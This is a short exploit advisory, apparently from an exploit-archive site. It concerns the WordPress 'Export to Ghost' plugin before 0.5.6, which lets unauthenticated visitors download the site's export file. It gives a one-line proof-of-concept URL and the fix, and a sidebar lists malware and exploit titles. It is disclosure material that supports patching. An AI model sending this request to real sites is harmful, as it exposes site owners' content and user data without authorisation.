WordPress Export to Ghost Unrestricted Export Download

Posted on 30 November -0001

<HTML><HEAD><TITLE>WordPress Export to Ghost Unrestricted Export Download</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY> Exploit Title: WordPress Export to Ghost Unrestricted Export Download
# Date: 28-04-2016
# Software Link: https://wordpress.org/plugins/ghost
# Exploit Author: Josh Brody
# Contact: http://twitter.com/joshmn
# Website: http://josh.mn/
# Category: webapps
  
1. Description
    
Any visitor can download the Ghost Export file because of a failure to check if an admin user is properly authenticated. Assume all versions < 0.5.6 are vulnerable.
    
2. Proof of Concept
 
http://example.com/wp-admin/tools.php?ghostexport=true&submit=Download+Ghost+file
 
File will be downloaded.
    
3. Solution:
 
Update to version 0.5.6
 
https://downloads.wordpress.org/plugin/ghost.0.5.6.zip
</BODY></HTML>

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Zope 5.9 Command Injection
SAP Cloud Connector 2.16.1 Missing Validation
Cacti 1.2.26 Remote Code Execution
Prison Management System Using PHP SQL Injection
Leafpub 1.1.9 Cross Site Scripting

Last 20